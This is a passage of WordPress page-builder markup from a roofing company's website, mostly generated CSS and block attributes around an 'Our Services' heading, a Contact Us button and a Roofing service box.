.skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-57952f87-1484-4ebd-851f-822a3d450cc3\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b7d6108a-a14d-4498-85a9-8c42833b5557\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b7d6108a-a14d-4498-85a9-8c42833b5557\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"63ddace3-1c17-4204-b706-d0b433daef69\"} -->\n<style type=\"text/css\"> .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-63ddace3-1c17-4204-b706-d0b433daef69\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"3d60bfc1-b9eb-4ec8-9435-1256841854bd\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"056cb894-6454-42df-942f-dfc188516e3c\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-056cb894-6454-42df-942f-dfc188516e3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"50e69a29-82aa-4d9a-8393-5d7206f14a34\"} -->\n<style type=\"text/css\"> .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-50e69a29-82aa-4d9a-8393-5d7206f14a34 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"8084ee78-5871-48ad-a7a9-1e3b52164921\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8084ee78-5871-48ad-a7a9-1e3b52164921\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"dd2fb7db-992d-423c-ac16-d676e4901ec9\"} -->\n<style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a new roof replacement from Dunrite.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column 